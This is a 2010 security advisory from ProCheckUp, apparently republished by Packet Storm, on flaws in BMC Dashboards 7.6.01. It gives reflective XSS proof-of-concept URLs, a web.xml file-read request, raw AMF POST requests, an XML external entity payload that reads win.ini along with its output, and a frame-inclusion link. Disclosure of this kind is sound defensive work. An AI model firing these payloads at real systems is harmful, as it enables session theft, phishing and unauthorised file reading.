BMC Dashboards version 7.6.01 suffers from cross site scripting and arbitrary file reading vulnerabilities.
94e598cb8a417f4029046945b2b6cbe27cca569b5151f8df4790880703c96972PR10-18: Multiple XSS (Cross Site Scripting) and arbitrary file reading
flaws within BMC Dashboards by BMC
Vulnerability found: 1st Oct 2010
Vendor informed:
Vulnerability fixed:
Severity: High
Description:
BMC Dashboards provides service desk analysts with a dashboard view of
aggregated performance indicators, enabling timely fact based decisions.
ProCheckUp has discovered that multiple Remedy Knowledge Management
pages are vulnerable to reflective XSS attacks, along with a directory
traversal vulnerability which allows arbitrary files to be read outside
the web-root.
Version: 7.6.01 - http://www.bmc.com/
1) The following demonstrate the reflective XSS flaw
a)
https://target-domain.foo/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm
b)
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>
c) multiple XSS within demo pages
https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>
https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean
d) Multiple XSS as the AMF stream is unfiltered
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58..... ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation
bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#. name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade
results:-
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651
......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber
codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d
Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties. No
authentication is required to exploit this vulnerability.
2) Application is vulnerable to file source code reading limited to the
web-root.
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml
Consequences:
File source code reading allows Files to be retrieved from the target
server, provided that the location on the file system is known. No
authentication is required to exploit this vulnerability.
3) Verbose error pages - when parsing malicious amf messages
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Host: target-domain.foo
Content-Type: application/x-amf
Content-Length: 462
COflex.messaging.messages.RemotingMessagetimestampheadersoperation body
source
remotePassword
remoteUsernameparametersmessageIdtimeToLiveclientIddestination
SIflex.messaging.messages.ErrorMessageheadersrootCause bodycorrelationIdfaultDetailfaultStringclientIdtimeToLivedestinationtimestampextendedDatafaultCodemessageId
acom.bmc.bsm.dashboards.util.logging.BSDExceptionmessage guid!localizedMessage
causeargumentsprioritytracebackerrorCodecauseSummarySystem
error. Contact your system administrator for assistance.
Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifierAdZZZZZZZZJIiCvq53w9q0gerq4j8y0n80
3;java.io.FileNotFoundException
"$?cf:\Program Files\BMC
Software\BMCDashboardsForBSM\BSMDashboards\archive\208Archive_1.025350<a>d026634a338.dar
(The filename, directory name, or volume label syntax is
incorrect):
ERRORÇecom.bmc.bsm.dashboards.util.logging.BSDException: System
error. Contact your system administrator for assistance.
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchiveHelper(DashboardArchiveFacadeImpl.java:585)
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchive(DashboardArchiveFacadeImpl.java:526)
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.getUndefinedDataSources(DashboardArchiveFacadeImpl.java:193)
at sun.reflect.GeneratedMethodAccessor767.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl$1.run(TransactionInvocationHandlerImpl.java:66)
at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:117)
at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:107)
at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl.invoke(TransactionInvocationHandlerImpl.java:60)
at $Proxy54.getUndefinedDataSources(Unknown Source)
4) Vulnerable to directory traversal as uses Adobe BlazeDS, breaking
out of the webroot see http://seclists.org/fulldisclosure/2010/Feb/383
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10)
Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C)
Content-type: application/x-amf
POST DATA
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "../win.ini"> ]>
<amfx ver="3"><body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo
Consequences:
Directory traversal allows Files to be retrieved from the target server
outside the webroot, provided that the location on the file system is
known. Arbitrary file uploading should also be possible, no
authentication is required to exploit this vulnerability.
5) Application is vulnerable to remote frame inclusion
https://target-domain.foo/bmc_help2u/help_services/html/index.htm?&URL=http://www.procheckup.com
Consequences:
An attacker may be able to gain access to confidential data, by carry
out a phishing attack.
Fix:
References:
http://www.procheckup.com/Vulnerabilities.php
Credits: Richard Brain and Jan Fry of ProCheckUp Ltd (www.procheckup.com)
Legal:
Copyright 2010 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed